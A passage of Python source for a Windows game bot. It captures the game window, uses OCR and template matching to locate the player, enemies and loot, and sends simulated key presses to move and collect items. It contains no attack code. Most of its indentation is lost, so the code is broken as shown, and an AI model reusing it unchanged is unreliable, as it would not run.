self.h = self.h - titlebar_pixels - border_pixels
self.cropped_x = border_pixels
self.cropped_y = titlebar_pixels
else:
self.cropped_x = 0
self.cropped_y = 0
self.w += 3
else:
self.w = self.custom_rect[2] - self.custom_rect[0]
self.h = self.custom_rect[3] - self.custom_rect[1]
self.cropped_x = self.custom_rect[0]
self.cropped_y = self.custom_rect[1]
self.offset_x = self.window_rect[0] + self.cropped_x
self.offset_y = self.window_rect[1] + self.cropped_y
# WARNING: need to call the update_window_position function to prevent errors
# That would come from moving the window after starting the bot
def get_screen_position(self, pos):
return (pos[0] + self.offset_x, pos[1] + self.offset_y)
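# Illustrative sketch (not part of the original module): typical usage of the
# WindowCapture class above. The window title is a placeholder.
def _example_capture_loop(window_title="Untitled - Notepad"):
    wincap = WindowCapture(window_title)
    while True:
        screenshot = wincap.get_screenshot()
        cv2.imshow("capture", screenshot)
        if cv2.waitKey(1) & 0xFF == ord("q"):
            break
    cv2.destroyAllWindows()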
class BotUtils:
def grab_online_servers():
output = subprocess.run("arp -a", capture_output=True).stdout.decode()
list_ips = []
with open("servers.txt", "r") as f:
lines = f.readlines()
for ip in lines:
if ip.strip() in output:
list_ips.append(ip.strip())
return list_ips
def grab_current_lan_ip():
output = subprocess.run(
"ipconfig", capture_output=True).stdout.decode()
_, output = output.split("IPv4 Address. . . . . . . . . . . : 169")
output, _ = output.split("Subnet Mask", maxsplit=1)
current_lan_ip = "169" + output.strip()
return current_lan_ip
def start_server_threads(list_servers):
for server in list_servers:
t = threading.Thread(target=server.main_loop)
t.start()
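    # Returns the index of the (x, y) pair with the smallest straight-line
    # distance to the origin, or False if the list is empty (note that an
    # index of 0 is also falsy to callers that truth-test the result).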
def grab_closest(rel_list: list):
closest_index = False
smallest_dist = 100000
for i, pair in enumerate(rel_list):
x = abs(pair[0])
y = abs(pair[1])
hypot = math.hypot(x, y)
if hypot < smallest_dist:
smallest_dist = hypot
closest_index = i
return closest_index
def grab_order_closeness(relatives):
dists = []
for x, y in relatives:
dists.append(math.hypot(x, y))
return sorted(range(len(dists)), key=dists.__getitem__)
def grab_order_lowest_y(coords):
sorted_by_second = sorted(coords, key=lambda tup: tup[1], reverse=True)
return sorted_by_second
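    # Opens the big map, finds the player marker and walks towards map
    # coordinate (x, y) with a Follower until within `margin` pixels.
    # Returns True on arrival, False if the player cannot be tracked.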
def move_bigmap_dynamic(x, y, gamename=False, rect=False, checkmap=True, margin=1):
if checkmap:
while not BotUtils.detect_bigmap_open(gamename):
BotUtils.try_toggle_map_clicking()
time.sleep(0.03)
else:
BotUtils.try_toggle_map()
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
# Then need to find where the player is
if not rect:
rect = [561, 282, 1111, 666]
playerx, playery = BotUtils.grab_player_posv2(gamename, rect)
if not playerx:
if not checkmap:
time.sleep(0.5)
BotUtils.try_toggle_map()
time.sleep(0.005)
playerx, playery = BotUtils.grab_player_posv2(gamename, rect)
if not playerx:
return False
else:
time.sleep(0.5)
BotUtils.try_toggle_map()
time.sleep(0.005)
playerx, playery = BotUtils.grab_player_posv2(gamename, rect)
if not playerx:
print("Unable to find player")
return False
relx = x - playerx
rely = playery - y
follower = Follower(margin)
noplyr_count = 0
while abs(relx) > margin or abs(rely) > margin:
rect = [playerx - 50, playery - 50, playerx + 50, playery + 50]
playerx, playery = BotUtils.grab_player_posv2(gamename, rect)
if playerx:
if noplyr_count > 0:
noplyr_count -= 1
relx = x - playerx
rely = playery - y
follower.navigate_towards(relx, rely)
else:
noplyr_count += 1
if noplyr_count > 10:
break
time.sleep(0.02)
follower.release_all_keys()
BotUtils.try_toggle_map()
if noplyr_count > 10:
return False
else:
return True
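    # Walks diagonally towards (x, y) by holding two arrow keys at once and
    # releasing each one after a time proportional to remaining distance / speed.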
    # angle is the room's left-to-right travel direction, with north being 0 degrees
def move_diagonal(x, y, speed=20, rel=False, gamename=False, angle=90):
# If not a direct relative move command
if not rel:
BotUtils.try_toggle_map()
time.sleep(0.1)
if not BotUtils.detect_bigmap_open(gamename):
# print("Didn't detect bigmap first time")
time.sleep(0.5)
BotUtils.try_toggle_map_clicking()
# BotUtils.try_toggle_map_clicking()
time.sleep(0.1)
player_pos = BotUtils.grab_player_pos(gamename)
# print("Player pos detected by diag:{}".format(player_pos))
start_time = time.time()
while not player_pos[0]:
print("Attempting to find player again")
time.sleep(0.05)
if not BotUtils.detect_bigmap_open(gamename):
BotUtils.try_toggle_map_clicking()
if not BotUtils.detect_bigmap_open(gamename):
BotUtils.try_toggle_map()
time.sleep(0.05)
player_pos = BotUtils.grab_player_pos(gamename)
if time.time() - start_time > 5:
print("Error with finding player")
os._exit(1)
BotUtils.close_map_and_menu(gamename)
relx = player_pos[0] - int(x)
rely = int(y) - player_pos[1]
            while abs(relx) > 100 or abs(rely) > 100:
# print("Travel distance is too far, x:{},y:{}".format(relx, rely))
# CustomInput.press_key(CustomInput.key_map["right"], "right")
# time.sleep(0.01)
# CustomInput.release_key(CustomInput.key_map["right"], "right")
time.sleep(0.4)
if not BotUtils.detect_bigmap_open(gamename):
print("trying to open map again")
BotUtils.try_toggle_map_clicking()
time.sleep(0.3)
player_pos = BotUtils.grab_player_pos(gamename)
relx = player_pos[0] - int(x)
rely = int(y) - player_pos[1]
BotUtils.close_map_and_menu(gamename)
# Otherwise treat x,y as direct commands
else:
relx = x
rely = y
mult = 0.707
if relx > 0:
keyx = "left"
CustomInput.press_key(CustomInput.key_map["left"], "left")
timeleftx = float("{:.4f}".format(abs(relx/(speed*mult))))
elif relx < 0:
keyx = "right"
CustomInput.press_key(CustomInput.key_map["right"], "right")
timeleftx = float("{:.4f}".format(abs(relx/(speed*mult))))
else:
keyx = "right"
timeleftx = 0
mult = 1
if rely > 0:
keyy = "down"
CustomInput.press_key(CustomInput.key_map["down"], "down")
timelefty = float("{:.4f}".format(abs(rely/(speed*mult))))
elif rely < 0:
keyy = "up"
CustomInput.press_key(CustomInput.key_map["up"], "up")
timelefty = float("{:.4f}".format(abs(rely/(speed*mult))))
else:
keyy = "up"
timelefty = 0
if relx != 0:
timeleftx = float("{:.4f}".format(abs(relx/speed)))
first_sleep = min([timeleftx, timelefty])
second_sleep = max([timeleftx, timelefty])
first_key = [keyx, keyy][[timeleftx, timelefty].index(first_sleep)]
second_key = [keyx, keyy][[timeleftx, timelefty].index(second_sleep)]
if first_sleep < 0.009:
if second_sleep < 0.009:
pass
else:
time.sleep(second_sleep-0.009)
CustomInput.release_key(
CustomInput.key_map[second_key], second_key)
elif timelefty == timeleftx:
time.sleep(first_sleep-0.009)
CustomInput.release_key(CustomInput.key_map[first_key], first_key)
CustomInput.release_key(
CustomInput.key_map[second_key], second_key)
else:
time.sleep(first_sleep - 0.009)
CustomInput.release_key(CustomInput.key_map[first_key], first_key)
time.sleep((second_sleep-first_sleep-0.009)*mult)
CustomInput.release_key(
CustomInput.key_map[second_key], second_key)
def move_towards(value, dir):
if dir == "x":
if value > 0:
key = "left"
else:
key = "right"
elif dir == "y":
if value > 0:
key = "down"
else:
key = "up"
CustomInput.press_key(CustomInput.key_map[key], key)
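    # Reads the player position from the big map (unless rel=True), then
    # resolves the x and y travel one axis at a time, optionally checking for
    # loot along the way when loot=True.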
def move_to(gamename, x, y, angle=90, yfirst=True, speed=22.5, loot=False, plyr=False, rel=False):
if not rel:
if not BotUtils.detect_bigmap_open(gamename):
BotUtils.try_toggle_map()
player_pos = BotUtils.grab_player_pos(gamename)
start_time = time.time()
while not player_pos:
time.sleep(0.05)
if not BotUtils.detect_bigmap_open(gamename):
BotUtils.try_toggle_map()
time.sleep(0.05)
player_pos = BotUtils.grab_player_pos(gamename)
if time.time() - start_time > 5:
print("Error with finding player")
os._exit(1)
BotUtils.close_map_and_menu(gamename)
relx = player_pos[0] - int(x)
rely = int(y) - player_pos[1]
            while abs(relx) > 100 or abs(rely) > 100:
CustomInput.press_key(CustomInput.key_map["right"], "right")
CustomInput.release_key(CustomInput.key_map["right"], "right")
time.sleep(0.02)
player_pos = BotUtils.grab_player_pos(gamename)
relx = player_pos[0] - int(x)
rely = int(y) - player_pos[1]
else:
relx = x
rely = y
if not yfirst:
if not loot:
BotUtils.resolve_dir_v2(relx, "x", speed)
BotUtils.resolve_dir_v2(rely, "y", speed)
else:
lootfound = BotUtils.resolve_dir_with_looting(
relx, "x", speed, gamename)
if lootfound:
Looting.grab_all_visible_loot(gamename, plyr)
# Continue to destination without further looting (prevent stuck)
BotUtils.move_to(gamename, x, y, angle, yfirst, speed)
# When at destination check for loot again
if Looting.check_for_loot(gamename):
Looting.grab_all_visible_loot(gamename, plyr)
# If needs be return to destination
BotUtils.move_to(gamename, x, y, angle, yfirst, speed)
else:
lootfound = BotUtils.resolve_dir_with_looting(
rely, "y", speed, gamename)
if lootfound:
Looting.grab_all_visible_loot(gamename, plyr)
# Continue to destination without further looting (prevent stuck)
BotUtils.move_to(gamename, x, y, angle, yfirst, speed)
# When at destination check for loot again
if Looting.check_for_loot(gamename):
Looting.grab_all_visible_loot(gamename, plyr)
# If needs be return to destination
BotUtils.move_to(
gamename, x, y, angle, yfirst, speed)
else:
if not loot:
BotUtils.resolve_dir_v2(rely, "y", speed)
BotUtils.resolve_dir_v2(relx, "x", speed)
else:
lootfound = BotUtils.resolve_dir_with_looting(
rely, "y", speed, gamename)
if lootfound:
Looting.grab_all_visible_loot(gamename, plyr)
# Continue to destination without further looting (prevent stuck)
BotUtils.move_to(gamename, x, y, angle, yfirst, speed)
# When at destination check for loot again
if Looting.check_for_loot(gamename):
Looting.grab_all_visible_loot(gamename, plyr)
# If needs be return to destination
BotUtils.move_to(gamename, x, y, angle, yfirst, speed)
else:
lootfound = BotUtils.resolve_dir_with_looting(
relx, "x", speed, gamename)
if lootfound:
Looting.grab_all_visible_loot(gamename, plyr)
# Continue to destination without further looting (prevent stuck)
BotUtils.move_to(gamename, x, y, angle, yfirst, speed)
# When at destination check for loot again
if Looting.check_for_loot(gamename):
Looting.grab_all_visible_loot(gamename, plyr)
# If needs be return to destination
BotUtils.move_to(
gamename, x, y, angle, yfirst, speed)
def resolve_dir_v2(value, dir, speed):
if dir == "x":
if value > 0:
key = "left"
else:
key = "right"
elif dir == "y":
if value > 0:
key = "down"
else:
key = "up"
time_reqd = abs(value/speed)
if time_reqd > 0.003:
CustomInput.press_key(CustomInput.key_map[key], key)
time.sleep(time_reqd-0.003)
CustomInput.release_key(CustomInput.key_map[key], key)
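    # Same as resolve_dir_v2, but for long moves the key is held while loot
    # checks run roughly every 1.65 s; returns True as soon as loot is detected,
    # otherwise the result of a final loot check.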
def resolve_dir_with_looting(value, dir, speed, gamename):
if dir == "x":
if value > 0:
key = "left"
else:
key = "right"
elif dir == "y":
if value > 0:
key = "down"
else:
key = "up"
time_reqd = abs(value/speed)
start_time = time.time()
if time_reqd > 0.003:
CustomInput.press_key(CustomInput.key_map[key], key)
# Maximum lootcheck time is about 0.3secs worst case
# Nominal is about 0.2s
if time_reqd < 2:
time.sleep(time_reqd-0.003)
CustomInput.release_key(CustomInput.key_map[key], key)
else:
BotUtils.close_map(gamename)
loops = math.floor(time_reqd/2)
for i in range(loops):
time.sleep(1.65)
result = Looting.check_for_loot(gamename)
if result:
CustomInput.release_key(CustomInput.key_map[key], key)
return True
time_left = start_time+time_reqd-time.time()
time.sleep(time_left)
CustomInput.release_key(CustomInput.key_map[key], key)
return Looting.check_for_loot(gamename)
def resolve_single_direction(speed, value, dir, PAG=False):
if not PAG:
sleep_time = 0.003
else:
sleep_time = 0.1
if dir == "x":
if value > 0:
key = "left"
else:
key = "right"
elif dir == "y":
if value > 0:
key = "down"
else:
key = "up"
time_reqd = abs(value/speed)
key_map = CustomInput.grab_key_dict()
if not PAG:
CustomInput.press_key(key_map[key], key)
else:
pydirectinput.keyDown(key)
try:
time.sleep(time_reqd-sleep_time)
except:
pass
if not PAG:
CustomInput.release_key(key_map[key], key)
else:
            pydirectinput.keyUp(key)
def list_window_names():
def winEnumHandler(hwnd, ctx):
if win32gui.IsWindowVisible(hwnd):
print(hex(hwnd), win32gui.GetWindowText(hwnd))
win32gui.EnumWindows(winEnumHandler, None)
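    # HSV-filters a screenshot for enemy health-bar colours, groups the
    # resulting contours into rectangles and returns their centre points.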
def grab_hpbar_locations(gamename=False):
if gamename:
wincap = WindowCapture(gamename, [100, 135, 1223, 688])
original_image = wincap.get_screenshot()
else:
original_image = cv2.imread(os.path.dirname(
os.path.abspath(__file__)) + "/testimages/healthbars.jpg")
filter = HsvFilter(20, 174, 245, 26, 193, 255, 0, 0, 0, 0)
output_image = BotUtils.filter_blackwhite_invert(
filter, original_image, True)
output_image = cv2.blur(output_image, (2, 2))
_, thresh = cv2.threshold(output_image, 127, 255, 0)
contours, _ = cv2.findContours(
thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
contours = sorted(contours, key=cv2.contourArea, reverse=True)
if len(contours) < 2:
return False
contours.pop(0)
rectangles = []
for contour in contours:
(x, y), _ = cv2.minEnclosingCircle(contour)
rectangles.append([x-10, y, 20, 5])
rectangles.append([x-10, y, 20, 5])
rectangles, _ = cv2.groupRectangles(
rectangles, groupThreshold=1, eps=0.8)
points = []
for (x, y, w, h) in rectangles:
center_x = x + int(w/2)
center_y = y + int(h/2)
points.append((center_x, center_y))
return points
def grab_character_location(player_name, gamename=False):
player_chars = "".join(set(player_name))
if gamename:
wincap = WindowCapture(gamename, [200, 235, 1123, 688])
original_image = wincap.get_screenshot()
else:
original_image = cv2.imread(os.path.dirname(
os.path.abspath(__file__)) + "/testimages/test_sensitive.jpg")
filter = HsvFilter(0, 0, 119, 179, 49, 255, 0, 0, 0, 0)
output_image = BotUtils.filter_blackwhite_invert(
filter, original_image, return_gray=True)
rgb = cv2.cvtColor(output_image, cv2.COLOR_GRAY2RGB)
tess_config = '--psm 6 --oem 3 -c tessedit_char_whitelist=' + player_chars
results = pytesseract.image_to_data(
rgb, output_type=pytesseract.Output.DICT, lang='eng', config=tess_config)
try:
best_match, _ = process.extractOne(
player_name, results["text"], score_cutoff=0.8)
i = results["text"].index(best_match)
x = int(results["left"][i] + (results["width"][i]/2))
y = int(results["top"][i] + (results["height"][i]/2))
# Account for the rect
x += 200
y += 235
return x, y
except:
return 640, 382
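    # Adds or subtracts `amount` from a single HSV channel, clamping the
    # result to the 0-255 range (used by the HSV filter helpers below).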
def shift_channel(c, amount):
if amount > 0:
lim = 255 - amount
c[c >= lim] = 255
c[c < lim] += amount
elif amount < 0:
amount = -amount
lim = amount
c[c <= lim] = 0
c[c > lim] -= amount
return c
def filter_blackwhite_invert(filter: HsvFilter, existing_image, return_gray=False, threshold=67, max=255):
hsv = cv2.cvtColor(existing_image, cv2.COLOR_BGR2HSV)
hsv_filter = filter
# add/subtract saturation and value
h, s, v = cv2.split(hsv)
s = BotUtils.shift_channel(s, hsv_filter.sAdd)
s = BotUtils.shift_channel(s, -hsv_filter.sSub)
v = BotUtils.shift_channel(v, hsv_filter.vAdd)
v = BotUtils.shift_channel(v, -hsv_filter.vSub)
hsv = cv2.merge([h, s, v])
# Set minimum and maximum HSV values to display
lower = np.array([hsv_filter.hMin, hsv_filter.sMin, hsv_filter.vMin])
upper = np.array([hsv_filter.hMax, hsv_filter.sMax, hsv_filter.vMax])
# Apply the thresholds
mask = cv2.inRange(hsv, lower, upper)
result = cv2.bitwise_and(hsv, hsv, mask=mask)
# convert back to BGR
img = cv2.cvtColor(result, cv2.COLOR_HSV2BGR)
# now change it to greyscale
grayImage = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# now change it to black and white
(thresh, blackAndWhiteImage) = cv2.threshold(
grayImage, threshold, max, cv2.THRESH_BINARY)
# now invert it
inverted = (255-blackAndWhiteImage)
if return_gray:
return inverted
inverted = cv2.cvtColor(inverted, cv2.COLOR_GRAY2BGR)
return inverted
def convert_pynput_to_pag(button):
PYNPUT_SPECIAL_CASE_MAP = {
'alt_l': 'altleft',
'alt_r': 'altright',
'alt_gr': 'altright',
'caps_lock': 'capslock',
'ctrl_l': 'ctrlleft',
'ctrl_r': 'ctrlright',
'page_down': 'pagedown',
'page_up': 'pageup',
'shift_l': 'shiftleft',
'shift_r': 'shiftright',
'num_lock': 'numlock',
'print_screen': 'printscreen',
'scroll_lock': 'scrolllock',
}
# example: 'Key.F9' should return 'F9', 'w' should return as 'w'
cleaned_key = button.replace('Key.', '')
if cleaned_key in PYNPUT_SPECIAL_CASE_MAP:
return PYNPUT_SPECIAL_CASE_MAP[cleaned_key]
return cleaned_key
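    # OCRs the name-plate region near the top left of the game window and
    # returns the longest token found, or False if nothing was read.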
def detect_player_name(gamename):
plyrname_rect = [165, 45, 320, 65]
plyrname_wincap = WindowCapture(gamename, plyrname_rect)
plyrname_filt = HsvFilter(0, 0, 103, 89, 104, 255, 0, 0, 0, 0)
# get an updated image of the game
image = plyrname_wincap.get_screenshot()
# pre-process the image
image = BotUtils.apply_hsv_filter(
image, plyrname_filt)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
results = pytesseract.image_to_data(
rgb, output_type=pytesseract.Output.DICT, lang='eng')
biggest = 0
name = False
for entry in results["text"]:
if len(entry) > biggest:
name = entry
biggest = len(entry)
return name
def detect_level_name(gamename, chars=False):
wincap = WindowCapture(gamename, [1121, 31, 1248, 44])
existing_image = wincap.get_screenshot()
filter = HsvFilter(0, 0, 0, 169, 34, 255, 0, 0, 0, 0)
save_image = BotUtils.apply_hsv_filter(existing_image, filter)
gray_image = cv2.cvtColor(save_image, cv2.COLOR_BGR2GRAY)
(thresh, blackAndWhiteImage) = cv2.threshold(
gray_image, 129, 255, cv2.THRESH_BINARY)
# now invert it
inverted = (255-blackAndWhiteImage)
save_image = cv2.cvtColor(inverted, cv2.COLOR_GRAY2BGR)
rgb = cv2.cvtColor(save_image, cv2.COLOR_BGR2RGB)
if not chars:
chars = "01234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
tess_config = '--psm 7 --oem 3 -c tessedit_char_whitelist=' + chars
result = pytesseract.image_to_string(
rgb, lang='eng', config=tess_config)[:-2]
return result
def apply_hsv_filter(original_image, hsv_filter: HsvFilter):
# convert image to HSV
hsv = cv2.cvtColor(original_image, cv2.COLOR_BGR2HSV)
# add/subtract saturation and value
h, s, v = cv2.split(hsv)
s = BotUtils.shift_channel(s, hsv_filter.sAdd)
s = BotUtils.shift_channel(s, -hsv_filter.sSub)
v = BotUtils.shift_channel(v, hsv_filter.vAdd)
v = BotUtils.shift_channel(v, -hsv_filter.vSub)
hsv = cv2.merge([h, s, v])
# Set minimum and maximum HSV values to display
lower = np.array([hsv_filter.hMin, hsv_filter.sMin, hsv_filter.vMin])
upper = np.array([hsv_filter.hMax, hsv_filter.sMax, hsv_filter.vMax])
# Apply the thresholds
mask = cv2.inRange(hsv, lower, upper)
result = cv2.bitwise_and(hsv, hsv, mask=mask)
# convert back to BGR for imshow() to display it properly
img = cv2.cvtColor(result, cv2.COLOR_HSV2BGR)
return img
def detect_sect_clear(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
# wincap = WindowCapture(gamename, custom_rect=[
# 464+156, 640, 464+261, 741])
wincap = WindowCapture(gamename, custom_rect=[
464+29, 640, 464+261, 641])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][127]]
g, h, i = [int(i) for i in image[0][-1]]
j, k, l = [int(i) for i in image[0][163]]
m, n, o = [int(i) for i in image[0][6]]
p, q, r = [int(i) for i in image[0][122]]
if a+b+c > 760:
if d+e+f > 760:
if j+k+l > 760:
# This is a false positive
return False
if m+n+o > 760:
# This is a false positive
return False
if p+q+r > 760:
# This is a false positive
return False
if g+h+i > 760:
# cv2.imwrite("testytest.jpg", image)
return True
return False
def detect_boss_healthbar(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
wincap = WindowCapture(gamename, custom_rect=[
415+97, 105+533, 415+98, 105+534])
image = wincap.get_screenshot()
# bgr
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][-1]]
if c+f > 440:
if a+b+d+e < 80:
return True
return False
def detect_xprompt(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
wincap = WindowCapture(gamename, custom_rect=[
1137, 694, 1163, 695])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][-1]]
if a+b+d+e > 960 and c+f == 140:
return True
else:
return False
def detect_gold_amount(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
wincap = WindowCapture(gamename, [681, 473, 748, 490])
image = wincap.get_screenshot()
# cv2.imwrite("testytest.jpg", image)
tess_config = '--psm 8 --oem 3 -c tessedit_char_whitelist=0123456789,'
result = pytesseract.image_to_string(
image, lang='eng', config=tess_config)[:-2].replace(",", "")
try:
return int(result)
except:
image = wincap.get_screenshot()
# cv2.imwrite("testytest.jpg", image)
tess_config = '--psm 8 --oem 3 -c tessedit_char_whitelist=0123456789,'
result = pytesseract.image_to_string(
image, lang='eng', config=tess_config)[:-2].replace(",", "")
try:
return int(result)
except:
print("Unable to detect gold value, see image saved")
return 0
def detect_petmenu_open(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
wincap = WindowCapture(gamename, [604, 120, 657, 122])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][8]]
g, h, i = [int(i) for i in image[0][-1]]
if a + g == 76:
if d+e+f > 750:
return True
return False
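    # Template-matches the player arrow on the big map (green HSV filter plus
    # plyr.jpg) and returns its window coordinates (rect-relative when
    # rect_rel=True), or (False, False) if the arrow is not found.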
def grab_player_pos(gamename=False, map_rect=False, rect_rel=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
if not map_rect:
map_rect = [561, 282, 1111, 666]
wincap = WindowCapture(gamename, map_rect)
filter = HsvFilter(34, 160, 122, 50, 255, 255, 0, 0, 0, 0)
image = wincap.get_screenshot()
save_image = BotUtils.filter_blackwhite_invert(filter, image)
# cv2.imwrite("C:\\Games\\first" +
# str(random.randint(0, 10000))+".jpg", save_image)
vision = Vision('plyr.jpg')
rectangles = vision.find(
save_image, threshold=0.31, epsilon=0.5)
if len(rectangles) < 1:
return False, False
points = vision.get_click_points(rectangles)
x, y = points[0]
if rect_rel:
return x, y
else:
x += map_rect[0]
y += map_rect[1]
return x, y
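    # RGB-filtered template match against plyrv2.jpg; when several candidates
    # are found, the one closest to the centre of the map rect is returned.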
def grab_player_posv2(gamename=False, map_rect=False, rect_rel=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
if not map_rect:
map_rect = [561, 282, 1111, 666]
wincap = WindowCapture(gamename, map_rect)
vision = VisionRGB("plyrv2.jpg")
screenshot = wincap.get_screenshot()
output_image = cv2.blur(screenshot, (6, 6))
rgb_filter = RgbFilter(79, 129, 0, 140, 206, 65)
output_image = vision.apply_rgb_filter(output_image, rgb_filter)
rectangles = vision.find(
output_image, threshold=0.41, epsilon=0.5)
if len(rectangles) < 1:
return False, False
else:
points = vision.get_click_points(rectangles)
# If more than one point detected
# Need to choose the one closest to rect centre
if len(points) > 1:
midx = 0.5*(map_rect[2] - map_rect[0]) + map_rect[0]
midy = 0.5*(map_rect[3] - map_rect[1]) + map_rect[1]
# Then convert lootlist to rel_pos list
relatives = BotUtils.convert_list_to_rel(
points, midx, midy, 150)
                # Grab the indexes in ascending order of closeness
order = BotUtils.grab_order_closeness(relatives)
# Then reorder the lootlist to match
points = [x for _, x in sorted(zip(order, points))]
if rect_rel:
return points[0]
x = points[0][0] + map_rect[0]
y = points[0][1] + map_rect[1]
return x, y
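    # Builds a dict mapping level names (lvl_name_num.txt) to map rectangles
    # (catalogue.txt), also registering aliases for common OCR misreads
    # ("1" -> "L", "ri" -> "n").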
def grab_level_rects():
rects = {}
# Load the translation from name to num
with open("lvl_name_num.txt") as f:
num_names = f.readlines()
for i, entry in enumerate(num_names):
num_names[i] = entry.split("-")
# Load the num to rect catalogue
with open("catalogue.txt") as f:
nums_rects = f.readlines()
for i, entry in enumerate(nums_rects):
nums_rects[i] = entry.split("-")
# Then add each rect to the rects dict against name
for number, name in num_names:
for num, area, rect in nums_rects:
if area == "FM" and num == number:
rects[name.rstrip().replace(" ", "")] = rect.rstrip()
if "1" in name:
rects[name.rstrip().replace(
" ", "").replace("1", "L")] = rect.rstrip()
if "ri" in name:
rects[name.rstrip().replace(
" ", "").replace("ri", "n").replace("1", "L")] = rect.rstrip()
break
return rects
def grab_level_rects_and_speeds():
rects = {}
speeds = {}
# Load the translation from name to num
with open("lvl_name_num.txt") as f:
num_names = f.readlines()
for i, entry in enumerate(num_names):
num_names[i] = entry.split("-")
# Load the num to rect catalogue
with open("catalogue.txt") as f:
nums_rects = f.readlines()
for i, entry in enumerate(nums_rects):
nums_rects[i] = entry.split("-")
# Finally load the level speeds
with open("lvl_speed.txt") as f:
num_speeds = f.readlines()
for i, entry in enumerate(num_speeds):
num_speeds[i] = entry.split("|")
# Then add each rect to the rects dict against name
# Also add each speed to the speed dict against name
for number, name in num_names:
for num, area, rect in nums_rects:
if area == "FM" and num == number:
rects[name.rstrip().replace(" ", "")] = rect.rstrip()
if "1" in name:
rects[name.rstrip().replace(
" ", "").replace("1", "L")] = rect.rstrip()
if "ri" in name:
rects[name.rstrip().replace(
" ", "").replace("ri", "n").replace("1", "L")] = rect.rstrip()
break
for num, speed in num_speeds:
if num == number:
speeds[name.rstrip().replace(
" ", "")] = float(speed.rstrip())
if "1" in name:
speeds[name.rstrip().replace(
" ", "").replace("1", "L")] = float(speed.rstrip())
if "ri" in name:
speeds[name.rstrip().replace(
" ", "").replace("ri", "n").replace("1", "L")] = float(speed.rstrip())
break
return rects, speeds
def string_to_rect(string: str):
# This converts the rect from catalogue into int list
return [int(i) for i in string.split(',')]
def move_mouse_centre(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
wincap = WindowCapture(gamename)
centre_x = int(0.5 * wincap.w +
wincap.window_rect[0])
centre_y = int(0.5 * wincap.h +
wincap.window_rect[1])
ctypes.windll.user32.SetCursorPos(centre_x, centre_y)
def detect_bigmap_open(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
wincap = WindowCapture(gamename, custom_rect=[819, 263, 855, 264])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][-2]]
if a+b+c < 30:
if d+e+f > 700:
return True
return False
def detect_menu_open(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
wincap = WindowCapture(gamename, custom_rect=[595, 278, 621, 281])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][-1]]
if a+b+c > 700:
if d+e+f > 700:
return True
return False
def convert_list_to_rel(item_list, playerx, playery, yoffset=0):
return_list = []
for item in item_list:
relx = playerx - item[0]
rely = item[1] - playery - yoffset
return_list.append((relx, rely))
return return_list
def close_map_and_menu(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
game_wincap = WindowCapture(gamename)
if BotUtils.detect_menu_open(gamename):
BotUtils.close_esc_menu(game_wincap)
if BotUtils.detect_bigmap_open(gamename):
BotUtils.close_map(game_wincap)
def try_toggle_map():
pydirectinput.keyDown("m")
time.sleep(0.05)
pydirectinput.keyUp("m")
time.sleep(0.08)
def try_toggle_map_clicking(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
game_wincap = WindowCapture(gamename)
ctypes.windll.user32.SetCursorPos(
int(1263+game_wincap.window_rect[0]), int(64+game_wincap.window_rect[1]))
ctypes.windll.user32.mouse_event(
0x0002, 0, 0, 0, 0)
time.sleep(0.05)
ctypes.windll.user32.mouse_event(
0x0004, 0, 0, 0, 0)
# pydirectinput.click(
# int(1263+game_wincap.window_rect[0]), int(64+game_wincap.window_rect[1]))
def close_map(game_wincap=False):
if not game_wincap:
with open("gamename.txt") as f:
gamename = f.readline()
game_wincap = WindowCapture(gamename)
pydirectinput.click(
int(859+game_wincap.window_rect[0]), int(260+game_wincap.window_rect[1]))
def close_esc_menu(game_wincap=False):
if not game_wincap:
with open("gamename.txt") as f:
gamename = f.readline()
game_wincap = WindowCapture(gamename)
pydirectinput.click(
int(749+game_wincap.window_rect[0]), int(280+game_wincap.window_rect[1]))
def get_monitor_scaling():
scaleFactor = ctypes.windll.shcore.GetScaleFactorForDevice(0) / 100
return float(scaleFactor)
def grab_res_scroll_left(gamename):
wincap = WindowCapture(gamename, [112, 130, 125, 143])
image = wincap.get_screenshot()
filter = HsvFilter(0, 0, 0, 179, 18, 255, 0, 0, 0, 0)
image = BotUtils.apply_hsv_filter(image, filter)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
tess_config = '--psm 7 --oem 3 -c tessedit_char_whitelist=1234567890'
result = pytesseract.image_to_string(
rgb, lang='eng', config=tess_config)[:-2]
return int(result)
def read_mission_name(gamename):
wincap = WindowCapture(gamename, [749, 152, 978, 170])
image = wincap.get_screenshot()
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
tess_config = '--psm 7 --oem 3 -c tessedit_char_whitelist=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
result = pytesseract.image_to_string(
rgb, lang='eng', config=tess_config)[:-2]
return result
def convert_click_to_ratio(gamename, truex, truey):
wincap = WindowCapture(gamename)
wincap.update_window_position(border=False)
scaling = BotUtils.get_monitor_scaling()
# print(scaling)
relx = (truex - (wincap.window_rect[0] * scaling))
rely = (truey - (wincap.window_rect[1] * scaling))
